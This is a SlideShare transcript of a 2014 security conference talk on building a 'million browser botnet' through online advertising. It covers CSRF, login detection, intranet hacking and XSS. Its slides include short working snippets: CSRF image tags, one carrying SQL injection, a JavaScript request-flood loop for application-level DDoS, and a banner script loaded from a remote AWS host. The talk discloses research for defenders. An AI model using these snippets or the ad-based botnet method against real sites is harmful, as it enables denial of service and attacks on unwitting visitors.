SlideShare a Scribd company logo
1 of 56
Download to read offline
Million Browser Botnet 
Matt Johansen/Michael Smith
©2014 AKAMAI | FASTER FORWARDTM 
About WhiteHat Security 
• Headquartered in Santa Clara, California 
• WhiteHat Sentinel: SaaS end-to-end website risk management platform 
(static & dynamic vulnerability assessment) 
• Employees: 340+
©2014 AKAMAI | FASTER FORWARDTM 
Bio 
Matt Johansen 
BlackHat, DEFCON, RSA Speaker 
Oversees assessment of 15,000+ websites 
Background in Penetration Testing 
Hacker turned Management 
I'm hiring… a lot…
©2014 AKAMAI | FASTER FORWARDTM 
When visiting ANY web page… 
…by nature of the way the Web works, it has near complete 
control of your Web browser for as long as you are there. 
Cross-Site Request Forgery (CSRF) 
Cross-Site Scripting (XSS) 
Clickjacking 
… and various other browser tricks
©2014 AKAMAI | FASTER FORWARDTM 
Overview: HTML / Javascript “malware” 
• Browser Interrogation 
• Evil Cross-Site Request Forgery 
• Login-Detection 
• Deanonymization 
• Intranet Hacking 
• Auto Cross-Site Scripting 
• Drive-by-Download (Traditional Malware) 
• [Distributed] Brute-Force Hash Cracking 
• Application-Level DDoS
©2014 AKAMAI | FASTER FORWARDTM 
Browser interrogation 
Auto-relay OS information, system settings, browser version, installed plug-ins, 
geo-location, etc.
©2014 AKAMAI | FASTER FORWARDTM 
Evil CSRF (Javascript not necessary) 
Force a browser to hack ANY other website, upload / download illegal 
content, search for embarrassing or incriminating terms, initiate bank wire 
transfers, post offensive messages, vote Edward Snowden as Times Person 
of the Year. 
<img src="http://server/cart?id=‘ UNION ALL SELECT user, pass,…”> 
<img src="http://torrent/D1C16AB1E2330AF3C4BE06AC43ABCE1CBD78C.torrent”> 
<img src="http://www.google.com/search?q=Justin+Bieber+fan+club”> 
<img src="http://att/search?uuid=10009”><img src="http://att/search?uuid=10010”> 
<img src="http://server/vote?id=4”> 
Spoofing Google search history with CSRF 
http://jeremiahgrossman.blogspot.com/2010/12/spoofing-google-search-history-with.html
©2014 AKAMAI | FASTER FORWARDTM 
Login-Detection 
<img src=”http://site/img.png” onload=”loggedin()” 
onerror=”notloggedin()” /> 
<script src=”http://site/javascript.js” 
onload=”loggedin()” onerror=”notloggedin()”></ 
script> 
A least 6 different techniques 
I Know What Websites You Are Logged-In To 
http://blog.whitehatsec.com/i-know-what-websites-you-are-logged-in-to-login-detection-via-csrf/
©2014 AKAMAI | FASTER FORWARDTM 
Deanonymize via mouse-click (clickjack) 
I Know Your Name, and Probably a Whole Lot More 
http://blog.whitehatsec.com/i-know-your-name-and-probably-a-whole-lot-more-deanonymization-via-likejacking-followjacking-etc/
©2014 AKAMAI | FASTER FORWARDTM 
Intranet Hacking 
<iframe src=”http://192.168.1.1/” onload=”detection()”></iframe> 
http://www.slideshare.net/jeremiahgrossman/hacking-intranet-websites-from-the-outside
©2014 AKAMAI | FASTER FORWARDTM 
Auto-XSS 
<iframe src=“http://server/q=…<inject XSS payload>”></iframe> 
§ Steal Cookies / Session Hijacking 
§ Steal “saved” passwords. 
§ Etc.
©2014 AKAMAI | FASTER FORWARDTM 
[Distributed] Brute-Force Hash Cracking 
“During our tests it has been possible to observe password 
guessing rates of 100,000 MD5 hashes/second in JavaScript.” 
- Lavakumar Kuppan
©2014 AKAMAI | FASTER FORWARDTM 
md5-password-cracker.js by Feross Aboukhadijeh 
http://feross.org/hacks/md5-password-cracker.js/ 
Ravan 
http://www.andlabs.org/tools/ravan/ravan.html
©2014 AKAMAI | FASTER FORWARDTM 
Application-Level DDoS 
“A browser can send a surprisingly large number of GET requests 
to a remote website using COR from WebWorkers. During tests it 
was found that around 10,000 requests/minute can be sent from a 
single browser.” 
- Lavakumar Kuppan 
§ Does not hold open [a lot of] TCP connections, just 
fires a lot HTTP request synchronously. 
Attacking with HTML5 
https://media.blackhat.com/bh-ad-10/Kuppan/Blackhat-AD-2010-Kuppan-Attacking-with-HTML5-wp.pdf
©2014 AKAMAI | FASTER FORWARDTM 
Connection-Limits (6-per hostname) 
http://www.browserscope.org/
©2014 AKAMAI | FASTER FORWARDTM 
Connection-Limit Bypass 
<script> 
for (var i = 0; i < 300; i++) { 
var img = new Image(); 
var url = ’http://target/?' + i; 
img.src = url; 
} 
</script> 
DEMO 
<script> 
for (var i = 0; i < 300; i++) { 
var img = new Image(); 
var url = 'ftp://localhost:80/?' + i; 
img.src = url; 
} 
</script> 
Apache Killer 
Limited to 6 connections [~300 connections]
©2014 AKAMAI | FASTER FORWARDTM 
Benefit of browser hacking this way… 
• No “malware” to detect, no “exploits,” no zero-days required. 
• No traces, few alarms. Prevent browser caching. 
• Everyone’s browser is vulnerable (by default). 
• Very, very easy. 
• The web is supposed to work this way.
©2014 AKAMAI | FASTER FORWARDTM 
Distribution of this type of “Javascript-malware” 
• A high trafficked website you own (blog, warez, pr0n, etc.) 
• HTML Injection on popular websites, forums etc. (XSS) 
• Man-in-the-Middle (WiFi) 
• [HTML] Email spam 
• Search Engine Poisoning 
• Compromise websites (mass SQL injection worms) 
• Third-Party Web Widgets (Weather, Counters, Trackers, etc.) 
WE Third-Party Web Widget Security FAQ NEED TO THINK BIGGER! 
http://jeremiahgrossman.blogspot.com/2010/07/third-party-web-widget-security-faq.html 
Owning bad guys {and mafia} with javascript botnets 
http://www.slideshare.net/chemai64/owning-bad-guys-and-mafia-with-javascript-botnets
“The most reliable, cost effective method to 
©2014 AKAMAI | FASTER FORWARDTM 
inject evil code is to buy an ad.” 
-Douglas Crockford
Advertisers 
©2014 AKAMAI | FASTER FORWARDTM 
Advertising Networks 
Blogs News Social Publishers 
Networks Reviews 
Visitors
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM 
Leverage Advertising Networks to… 
• Browser Interrogation 
• Evil Cross-Site Request Forgery 
• Login-Detection 
• User Deanonymization 
• Intranet Hacking 
• Auto Cross-Site Scripting 
• Drive-by-Download (Traditional Malware) 
• [Distributed] Brute-Force Hash Cracking 
• Application-Level DDoS 
• Cross-Domain Password Brute-Force
Cost-per-Click (CPC) 
Cost-per-Thousand (CPM) 
Price Range: $0.01 - $5.00 (USD) 
Million Browser Botnet @ $0.15 (CPM) = $150 (USD) 
Million Browser Botnet @ $0.50 (CPM) = $500 (USD) 
Stolen credit cards anyone? 
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM 
In side the banner code, we pointed a script tag to: 
http://ec2-23-20-141-160.compute-1.amazonaws.com/campaign.js 
for (var i = 0; i < 10000; i++) { 
var img = new Image(); 
var url = 'http://<amazon_aws>/iclick/id?' + i; 
img.src = url; 
} 
Then we could change the javascript payload to whatever, 
whenever, without any approval process.
DEMO 
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
We’re controlling someone else’s robots! 
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM 
Advertising Network kicks into gear…
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM
©2014 AKAMAI | FASTER FORWARDTM 
Characteristics of the Million Browser Botnet 
• Layer 3-4 and 5-7 
• Good distribution 
• Overlap with legitimate users 
• No spoofed sources 
• Referrer signature 
• We didn’t measure the FTP method
©2014 AKAMAI | FASTER FORWARDTM 
http://www.net-security.org/secworld.php?id=15179
“[N]obody's breaking the web, dude. 
©2014 AKAMAI | FASTER FORWARDTM 
Not now, not ever.” 
Dan Kaminsky to Jeremiah Grossman, December 21, 2010
©2014 AKAMAI | FASTER FORWARDTM 
Thank you 
Matt Johansen 
• Threat Research Center, Manager 
• Twitter: @mattjay 
• Email: matt@whitehatsec.com 
Michael Smith 
• CSIRT Director 
• Twitter: @rybolov 
• Email: mismith@akamai.com

More Related Content

What's hot

Edge 2014: Increasing Control with Property Manager with eBay
Edge 2014: Increasing Control with Property Manager with eBayEdge 2014: Increasing Control with Property Manager with eBay
Edge 2014: Increasing Control with Property Manager with eBayAkamai Technologies
 
Akamai company profile
Akamai company profileAkamai company profile
Akamai company profilerahulp9999
 
Edge 2016 service workers and other front end techniques
Edge 2016 service workers and other front end techniquesEdge 2016 service workers and other front end techniques
Edge 2016 service workers and other front end techniquesakamaidevrel
 
Responsive Web Demo with Akamai
Responsive Web Demo with AkamaiResponsive Web Demo with Akamai
Responsive Web Demo with AkamaiFran Albaladejo
 
Akamai: From Theory to Practice
Akamai: From Theory to PracticeAkamai: From Theory to Practice
Akamai: From Theory to PracticeLiz Bradley
 
Edge 2016 your hero images need you
Edge 2016 your hero images need youEdge 2016 your hero images need you
Edge 2016 your hero images need youakamaidevrel
 
Velocity EU 2014: Recycling the Web (why it's slowing your mobile app)
Velocity EU 2014: Recycling the Web (why it's slowing your mobile app)Velocity EU 2014: Recycling the Web (why it's slowing your mobile app)
Velocity EU 2014: Recycling the Web (why it's slowing your mobile app)Colin Bendell
 
Edge 2016 solving everyday problems with next generation mapping
Edge 2016 solving everyday problems with next generation mappingEdge 2016 solving everyday problems with next generation mapping
Edge 2016 solving everyday problems with next generation mappingakamaidevrel
 
Hans Nipshagen (Akamai) | TU - Hack & Attacks
Hans Nipshagen (Akamai) | TU - Hack & AttacksHans Nipshagen (Akamai) | TU - Hack & Attacks
Hans Nipshagen (Akamai) | TU - Hack & AttacksMedia Perspectives
 
UI5 with Akamai - Introduction to the Content Delivery Network
UI5 with Akamai - Introduction to the Content Delivery NetworkUI5 with Akamai - Introduction to the Content Delivery Network
UI5 with Akamai - Introduction to the Content Delivery NetworkGokul Anand E, PMP®
 
2015 Velocity SC: Convince your CFO that #perfmatters
2015 Velocity SC: Convince your CFO that #perfmatters2015 Velocity SC: Convince your CFO that #perfmatters
2015 Velocity SC: Convince your CFO that #perfmattersColin Bendell
 
EDNS0 Client-Subnet for DNS based CDNs by Matt Jansen
EDNS0 Client-Subnet for DNS based CDNs by Matt JansenEDNS0 Client-Subnet for DNS based CDNs by Matt Jansen
EDNS0 Client-Subnet for DNS based CDNs by Matt JansenMyNOG
 
Akamai connector for varnish
Akamai connector for varnishAkamai connector for varnish
Akamai connector for varnishVarnish Software
 
Real world experiences with HTTP/2 (Michael Gooding, Javier Garza from Akamai)
Real world experiences with HTTP/2 (Michael Gooding, Javier Garza from Akamai)Real world experiences with HTTP/2 (Michael Gooding, Javier Garza from Akamai)
Real world experiences with HTTP/2 (Michael Gooding, Javier Garza from Akamai)💻 Javier Garza
 
App-solute Testing: Making App Testing with Akamai Easy
App-solute Testing: Making App Testing with Akamai EasyApp-solute Testing: Making App Testing with Akamai Easy
App-solute Testing: Making App Testing with Akamai EasyAkamai Developers & Admins
 
Scaling WooCommerce on WP Engine
Scaling WooCommerce on WP EngineScaling WooCommerce on WP Engine
Scaling WooCommerce on WP EngineEdmund Turbin
 
Asynchronous Programming
Asynchronous ProgrammingAsynchronous Programming
Asynchronous ProgrammingLearnNowOnline
 
Moving desktops & applications to AWS with Amazon WorkSpaces & AppStream 2 - ...
Moving desktops & applications to AWS with Amazon WorkSpaces & AppStream 2 - ...Moving desktops & applications to AWS with Amazon WorkSpaces & AppStream 2 - ...
Moving desktops & applications to AWS with Amazon WorkSpaces & AppStream 2 - ...Amazon Web Services
 
Best cdn for e commerce
Best cdn for e commerceBest cdn for e commerce
Best cdn for e commerceericlevis012
 

What's hot (20)

Edge 2014: Increasing Control with Property Manager with eBay
Edge 2014: Increasing Control with Property Manager with eBayEdge 2014: Increasing Control with Property Manager with eBay
Edge 2014: Increasing Control with Property Manager with eBay
 
Akamai company profile
Akamai company profileAkamai company profile
Akamai company profile
 
Edge 2016 service workers and other front end techniques
Edge 2016 service workers and other front end techniquesEdge 2016 service workers and other front end techniques
Edge 2016 service workers and other front end techniques
 
Responsive Web Demo with Akamai
Responsive Web Demo with AkamaiResponsive Web Demo with Akamai
Responsive Web Demo with Akamai
 
Akamai: From Theory to Practice
Akamai: From Theory to PracticeAkamai: From Theory to Practice
Akamai: From Theory to Practice
 
Edge 2016 your hero images need you
Edge 2016 your hero images need youEdge 2016 your hero images need you
Edge 2016 your hero images need you
 
Velocity EU 2014: Recycling the Web (why it's slowing your mobile app)
Velocity EU 2014: Recycling the Web (why it's slowing your mobile app)Velocity EU 2014: Recycling the Web (why it's slowing your mobile app)
Velocity EU 2014: Recycling the Web (why it's slowing your mobile app)
 
Edge 2016 solving everyday problems with next generation mapping
Edge 2016 solving everyday problems with next generation mappingEdge 2016 solving everyday problems with next generation mapping
Edge 2016 solving everyday problems with next generation mapping
 
Hans Nipshagen (Akamai) | TU - Hack & Attacks
Hans Nipshagen (Akamai) | TU - Hack & AttacksHans Nipshagen (Akamai) | TU - Hack & Attacks
Hans Nipshagen (Akamai) | TU - Hack & Attacks
 
UI5 with Akamai - Introduction to the Content Delivery Network
UI5 with Akamai - Introduction to the Content Delivery NetworkUI5 with Akamai - Introduction to the Content Delivery Network
UI5 with Akamai - Introduction to the Content Delivery Network
 
2015 Velocity SC: Convince your CFO that #perfmatters
2015 Velocity SC: Convince your CFO that #perfmatters2015 Velocity SC: Convince your CFO that #perfmatters
2015 Velocity SC: Convince your CFO that #perfmatters
 
EDNS0 Client-Subnet for DNS based CDNs by Matt Jansen
EDNS0 Client-Subnet for DNS based CDNs by Matt JansenEDNS0 Client-Subnet for DNS based CDNs by Matt Jansen
EDNS0 Client-Subnet for DNS based CDNs by Matt Jansen
 
Akamai connector for varnish
Akamai connector for varnishAkamai connector for varnish
Akamai connector for varnish
 
Real world experiences with HTTP/2 (Michael Gooding, Javier Garza from Akamai)
Real world experiences with HTTP/2 (Michael Gooding, Javier Garza from Akamai)Real world experiences with HTTP/2 (Michael Gooding, Javier Garza from Akamai)
Real world experiences with HTTP/2 (Michael Gooding, Javier Garza from Akamai)
 
App-solute Testing: Making App Testing with Akamai Easy
App-solute Testing: Making App Testing with Akamai EasyApp-solute Testing: Making App Testing with Akamai Easy
App-solute Testing: Making App Testing with Akamai Easy
 
Scaling WooCommerce on WP Engine
Scaling WooCommerce on WP EngineScaling WooCommerce on WP Engine
Scaling WooCommerce on WP Engine
 
Asynchronous Programming
Asynchronous ProgrammingAsynchronous Programming
Asynchronous Programming
 
Manage Your Akamai-as-Code with Terraform
Manage Your Akamai-as-Code with TerraformManage Your Akamai-as-Code with Terraform
Manage Your Akamai-as-Code with Terraform
 
Moving desktops & applications to AWS with Amazon WorkSpaces & AppStream 2 - ...
Moving desktops & applications to AWS with Amazon WorkSpaces & AppStream 2 - ...Moving desktops & applications to AWS with Amazon WorkSpaces & AppStream 2 - ...
Moving desktops & applications to AWS with Amazon WorkSpaces & AppStream 2 - ...
 
Best cdn for e commerce
Best cdn for e commerceBest cdn for e commerce
Best cdn for e commerce
 

Viewers also liked

Windows 10: Ease-of-use, multiple platforms, and security (plus fun stuff).
Windows 10: Ease-of-use, multiple platforms, and security (plus fun stuff).Windows 10: Ease-of-use, multiple platforms, and security (plus fun stuff).
Windows 10: Ease-of-use, multiple platforms, and security (plus fun stuff).DWP Information Architects Inc.
 
Security of Windows 10 IoT Core(FFRI Monthly Research 201506)
Security of Windows 10 IoT Core(FFRI Monthly Research 201506)Security of Windows 10 IoT Core(FFRI Monthly Research 201506)
Security of Windows 10 IoT Core(FFRI Monthly Research 201506)FFRI, Inc.
 
Web Browser Security - 2016 Comparative Test Results
Web Browser Security - 2016 Comparative Test ResultsWeb Browser Security - 2016 Comparative Test Results
Web Browser Security - 2016 Comparative Test ResultsNSS Labs
 
Phishing exposed
Phishing exposedPhishing exposed
Phishing exposedtamfin
 
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009ClubHack
 

Viewers also liked (11)

Incident handling.final
Incident handling.finalIncident handling.final
Incident handling.final
 
Windows 10: Ease-of-use, multiple platforms, and security (plus fun stuff).
Windows 10: Ease-of-use, multiple platforms, and security (plus fun stuff).Windows 10: Ease-of-use, multiple platforms, and security (plus fun stuff).
Windows 10: Ease-of-use, multiple platforms, and security (plus fun stuff).
 
Karunia Wijaya - Proactive Incident Handling
Karunia Wijaya - Proactive Incident HandlingKarunia Wijaya - Proactive Incident Handling
Karunia Wijaya - Proactive Incident Handling
 
Security of Windows 10 IoT Core(FFRI Monthly Research 201506)
Security of Windows 10 IoT Core(FFRI Monthly Research 201506)Security of Windows 10 IoT Core(FFRI Monthly Research 201506)
Security of Windows 10 IoT Core(FFRI Monthly Research 201506)
 
Incident handling of cyber espionage
Incident handling of cyber espionageIncident handling of cyber espionage
Incident handling of cyber espionage
 
Web Browser Security - 2016 Comparative Test Results
Web Browser Security - 2016 Comparative Test ResultsWeb Browser Security - 2016 Comparative Test Results
Web Browser Security - 2016 Comparative Test Results
 
Phishing exposed
Phishing exposedPhishing exposed
Phishing exposed
 
Browser security — ROOTS
Browser security — ROOTSBrowser security — ROOTS
Browser security — ROOTS
 
Browser Security
Browser SecurityBrowser Security
Browser Security
 
web browser ppt
web browser pptweb browser ppt
web browser ppt
 
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
 

Similar to WhiteHat Security experts reveal how to build a million browser botnet using online advertising

Holiday Retail Readiness: Preparing For Peak
Holiday Retail Readiness: Preparing For PeakHoliday Retail Readiness: Preparing For Peak
Holiday Retail Readiness: Preparing For PeakG3 Communications
 
Edge 2016 h2 in the real world
Edge 2016 h2 in the real worldEdge 2016 h2 in the real world
Edge 2016 h2 in the real worldakamaidevrel
 
게임 서비스를 위한 클라우드 네트워크 활용
게임 서비스를 위한 클라우드 네트워크 활용게임 서비스를 위한 클라우드 네트워크 활용
게임 서비스를 위한 클라우드 네트워크 활용Seung Heun Noh
 
Great Expectations - Dr. Tom Leighton, Akamai
Great Expectations - Dr. Tom Leighton, AkamaiGreat Expectations - Dr. Tom Leighton, Akamai
Great Expectations - Dr. Tom Leighton, AkamaiAkamai Technologies
 
Third Party Performance (Velocity, 2014)
Third Party Performance (Velocity, 2014)Third Party Performance (Velocity, 2014)
Third Party Performance (Velocity, 2014)Guy Podjarny
 
TL;DR Web Performance Workshop
TL;DR Web Performance WorkshopTL;DR Web Performance Workshop
TL;DR Web Performance WorkshopGareth Hughes
 
Tom uk soti_final_without video.4.21.15
Tom uk soti_final_without video.4.21.15Tom uk soti_final_without video.4.21.15
Tom uk soti_final_without video.4.21.15Liz Bradley
 
Cloud Delivery: The Path from Simple to Sophisticated
Cloud Delivery: The Path from Simple to SophisticatedCloud Delivery: The Path from Simple to Sophisticated
Cloud Delivery: The Path from Simple to SophisticatedAkamai Developers & Admins
 
Tom edge-keynote-2013. final
Tom edge-keynote-2013. finalTom edge-keynote-2013. final
Tom edge-keynote-2013. finalLiz Bradley
 
How to Counter Cybersecurity Attacks - Trust No One
How to Counter Cybersecurity Attacks - Trust No OneHow to Counter Cybersecurity Attacks - Trust No One
How to Counter Cybersecurity Attacks - Trust No OneElisabeth Bitsch-Christensen
 
What should I do when my website got hack?
What should I do when my website got hack?What should I do when my website got hack?
What should I do when my website got hack?Sumedt Jitpukdebodin
 
ウェブサイト最適化101 - 正しく測ろうあなたのサイト -
ウェブサイト最適化101 - 正しく測ろうあなたのサイト -ウェブサイト最適化101 - 正しく測ろうあなたのサイト -
ウェブサイト最適化101 - 正しく測ろうあなたのサイト -Taisuke Yamada
 
Building Cyber Resilience at the Speed of Business
Building Cyber Resilience at the Speed of BusinessBuilding Cyber Resilience at the Speed of Business
Building Cyber Resilience at the Speed of BusinessRahul Neel Mani
 
PLNOG 13: James Kretchmar: How Akamai scales to serve the largest events on t...
PLNOG 13: James Kretchmar: How Akamai scales to serve the largest events on t...PLNOG 13: James Kretchmar: How Akamai scales to serve the largest events on t...
PLNOG 13: James Kretchmar: How Akamai scales to serve the largest events on t...PROIDEA
 
Cloudlets and DevOps - A Dangerously Powerful Combination to Extend Capabilit...
Cloudlets and DevOps - A Dangerously Powerful Combination to Extend Capabilit...Cloudlets and DevOps - A Dangerously Powerful Combination to Extend Capabilit...
Cloudlets and DevOps - A Dangerously Powerful Combination to Extend Capabilit...Akamai Developers & Admins
 
Edge 2016 barbarians at the gateway
Edge 2016 barbarians at the gatewayEdge 2016 barbarians at the gateway
Edge 2016 barbarians at the gatewayakamaidevrel
 
Rise of The Hyper Connected Shopper
Rise of The Hyper Connected ShopperRise of The Hyper Connected Shopper
Rise of The Hyper Connected ShoppereTailing India
 
Threat intelligence at the cloud
Threat intelligence at the cloudThreat intelligence at the cloud
Threat intelligence at the cloudOr Katz
 

Similar to WhiteHat Security experts reveal how to build a million browser botnet using online advertising (20)

DESAYUNO DE TRABAJO AKAMAI
DESAYUNO DE TRABAJO AKAMAIDESAYUNO DE TRABAJO AKAMAI
DESAYUNO DE TRABAJO AKAMAI
 
Holiday Retail Readiness: Preparing For Peak
Holiday Retail Readiness: Preparing For PeakHoliday Retail Readiness: Preparing For Peak
Holiday Retail Readiness: Preparing For Peak
 
Edge 2016 h2 in the real world
Edge 2016 h2 in the real worldEdge 2016 h2 in the real world
Edge 2016 h2 in the real world
 
게임 서비스를 위한 클라우드 네트워크 활용
게임 서비스를 위한 클라우드 네트워크 활용게임 서비스를 위한 클라우드 네트워크 활용
게임 서비스를 위한 클라우드 네트워크 활용
 
Great Expectations - Dr. Tom Leighton, Akamai
Great Expectations - Dr. Tom Leighton, AkamaiGreat Expectations - Dr. Tom Leighton, Akamai
Great Expectations - Dr. Tom Leighton, Akamai
 
Third Party Performance (Velocity, 2014)
Third Party Performance (Velocity, 2014)Third Party Performance (Velocity, 2014)
Third Party Performance (Velocity, 2014)
 
TL;DR Web Performance Workshop
TL;DR Web Performance WorkshopTL;DR Web Performance Workshop
TL;DR Web Performance Workshop
 
Tom uk soti_final_without video.4.21.15
Tom uk soti_final_without video.4.21.15Tom uk soti_final_without video.4.21.15
Tom uk soti_final_without video.4.21.15
 
Cloud Delivery: The Path from Simple to Sophisticated
Cloud Delivery: The Path from Simple to SophisticatedCloud Delivery: The Path from Simple to Sophisticated
Cloud Delivery: The Path from Simple to Sophisticated
 
Tom edge-keynote-2013. final
Tom edge-keynote-2013. finalTom edge-keynote-2013. final
Tom edge-keynote-2013. final
 
How to Counter Cybersecurity Attacks - Trust No One
How to Counter Cybersecurity Attacks - Trust No OneHow to Counter Cybersecurity Attacks - Trust No One
How to Counter Cybersecurity Attacks - Trust No One
 
Self-Serviceability- Taking it Up a Notch!
Self-Serviceability- Taking it Up a Notch!Self-Serviceability- Taking it Up a Notch!
Self-Serviceability- Taking it Up a Notch!
 
What should I do when my website got hack?
What should I do when my website got hack?What should I do when my website got hack?
What should I do when my website got hack?
 
ウェブサイト最適化101 - 正しく測ろうあなたのサイト -
ウェブサイト最適化101 - 正しく測ろうあなたのサイト -ウェブサイト最適化101 - 正しく測ろうあなたのサイト -
ウェブサイト最適化101 - 正しく測ろうあなたのサイト -
 
Building Cyber Resilience at the Speed of Business
Building Cyber Resilience at the Speed of BusinessBuilding Cyber Resilience at the Speed of Business
Building Cyber Resilience at the Speed of Business
 
PLNOG 13: James Kretchmar: How Akamai scales to serve the largest events on t...
PLNOG 13: James Kretchmar: How Akamai scales to serve the largest events on t...PLNOG 13: James Kretchmar: How Akamai scales to serve the largest events on t...
PLNOG 13: James Kretchmar: How Akamai scales to serve the largest events on t...
 
Cloudlets and DevOps - A Dangerously Powerful Combination to Extend Capabilit...
Cloudlets and DevOps - A Dangerously Powerful Combination to Extend Capabilit...Cloudlets and DevOps - A Dangerously Powerful Combination to Extend Capabilit...
Cloudlets and DevOps - A Dangerously Powerful Combination to Extend Capabilit...
 
Edge 2016 barbarians at the gateway
Edge 2016 barbarians at the gatewayEdge 2016 barbarians at the gateway
Edge 2016 barbarians at the gateway
 
Rise of The Hyper Connected Shopper
Rise of The Hyper Connected ShopperRise of The Hyper Connected Shopper
Rise of The Hyper Connected Shopper
 
Threat intelligence at the cloud
Threat intelligence at the cloudThreat intelligence at the cloud
Threat intelligence at the cloud
 

More from Akamai Technologies

Akamai Intelligent Edge Security
Akamai Intelligent Edge SecurityAkamai Intelligent Edge Security
Akamai Intelligent Edge SecurityAkamai Technologies
 
Replacing recovery with resilience
Replacing recovery with resilienceReplacing recovery with resilience
Replacing recovery with resilienceAkamai Technologies
 
Competitive EDGE - Data Driven Differentiation
Competitive EDGE - Data Driven DifferentiationCompetitive EDGE - Data Driven Differentiation
Competitive EDGE - Data Driven DifferentiationAkamai Technologies
 
3 Reasons You Need Proactive Protection Against Malware
3 Reasons You Need Proactive Protection Against Malware3 Reasons You Need Proactive Protection Against Malware
3 Reasons You Need Proactive Protection Against MalwareAkamai Technologies
 
3 Reasons It's Time for a New Remote Access Model
3 Reasons It's Time for a New Remote Access Model3 Reasons It's Time for a New Remote Access Model
3 Reasons It's Time for a New Remote Access ModelAkamai Technologies
 
새로운 원격 접속 모델이 필요한 3가지 이유
새로운 원격 접속 모델이 필요한 3가지 이유새로운 원격 접속 모델이 필요한 3가지 이유
새로운 원격 접속 모델이 필요한 3가지 이유Akamai Technologies
 
更新遠端存取模式的 3 大理由
更新遠端存取模式的 3 大理由更新遠端存取模式的 3 大理由
更新遠端存取模式的 3 大理由Akamai Technologies
 
应该采用全新远程访问模式的 3 大原因
应该采用全新远程访问模式的 3 大原因应该采用全新远程访问模式的 3 大原因
应该采用全新远程访问模式的 3 大原因Akamai Technologies
 
3 つの理由 今こそ新しいリモート・アク セス・モデルを採用すべきと き
3 つの理由 今こそ新しいリモート・アク セス・モデルを採用すべきと き3 つの理由 今こそ新しいリモート・アク セス・モデルを採用すべきと き
3 つの理由 今こそ新しいリモート・アク セス・モデルを採用すべきと きAkamai Technologies
 
3 razões chegou a hora de um novo modelo de acesso remoto
3 razões chegou a hora de um novo modelo de acesso remoto3 razões chegou a hora de um novo modelo de acesso remoto
3 razões chegou a hora de um novo modelo de acesso remotoAkamai Technologies
 
3 motivi per cui è necessario un nuovo modello di accesso remoto
3 motivi per cui è necessario un nuovo modello di accesso remoto3 motivi per cui è necessario un nuovo modello di accesso remoto
3 motivi per cui è necessario un nuovo modello di accesso remotoAkamai Technologies
 
3 raisons de changer votre modèle d'accès à distance
3 raisons de changer votre modèle d'accès à distance3 raisons de changer votre modèle d'accès à distance
3 raisons de changer votre modèle d'accès à distanceAkamai Technologies
 
3 motivos por los que ahora es el momento perfecto para adoptar un nuevo mode...
3 motivos por los que ahora es el momento perfecto para adoptar un nuevo mode...3 motivos por los que ahora es el momento perfecto para adoptar un nuevo mode...
3 motivos por los que ahora es el momento perfecto para adoptar un nuevo mode...Akamai Technologies
 
3 Gründe für eine neue Art des Remotezugriffs
3 Gründe für eine neue Art des Remotezugriffs3 Gründe für eine neue Art des Remotezugriffs
3 Gründe für eine neue Art des RemotezugriffsAkamai Technologies
 
Customer Technology Day Chicago 2015
Customer Technology Day Chicago 2015Customer Technology Day Chicago 2015
Customer Technology Day Chicago 2015Akamai Technologies
 
Edge 2014: MPEG DASH – Tomorrow's Format Today
Edge 2014: MPEG DASH – Tomorrow's Format TodayEdge 2014: MPEG DASH – Tomorrow's Format Today
Edge 2014: MPEG DASH – Tomorrow's Format TodayAkamai Technologies
 
Site Shield Product Brief - Origin defense by cloaking web infrastructure and...
Site Shield Product Brief - Origin defense by cloaking web infrastructure and...Site Shield Product Brief - Origin defense by cloaking web infrastructure and...
Site Shield Product Brief - Origin defense by cloaking web infrastructure and...Akamai Technologies
 
Prolexic Routed Product Brief - DDoS defense for protecting network and data ...
Prolexic Routed Product Brief - DDoS defense for protecting network and data ...Prolexic Routed Product Brief - DDoS defense for protecting network and data ...
Prolexic Routed Product Brief - DDoS defense for protecting network and data ...Akamai Technologies
 
Web Application Accelerator Product Brief - Application delivery for global w...
Web Application Accelerator Product Brief - Application delivery for global w...Web Application Accelerator Product Brief - Application delivery for global w...
Web Application Accelerator Product Brief - Application delivery for global w...Akamai Technologies
 
Alta Product Brief - Cloud-based application delivery platform for web applic...
Alta Product Brief - Cloud-based application delivery platform for web applic...Alta Product Brief - Cloud-based application delivery platform for web applic...
Alta Product Brief - Cloud-based application delivery platform for web applic...Akamai Technologies
 

More from Akamai Technologies (20)

Akamai Intelligent Edge Security
Akamai Intelligent Edge SecurityAkamai Intelligent Edge Security
Akamai Intelligent Edge Security
 
Replacing recovery with resilience
Replacing recovery with resilienceReplacing recovery with resilience
Replacing recovery with resilience
 
Competitive EDGE - Data Driven Differentiation
Competitive EDGE - Data Driven DifferentiationCompetitive EDGE - Data Driven Differentiation
Competitive EDGE - Data Driven Differentiation
 
3 Reasons You Need Proactive Protection Against Malware
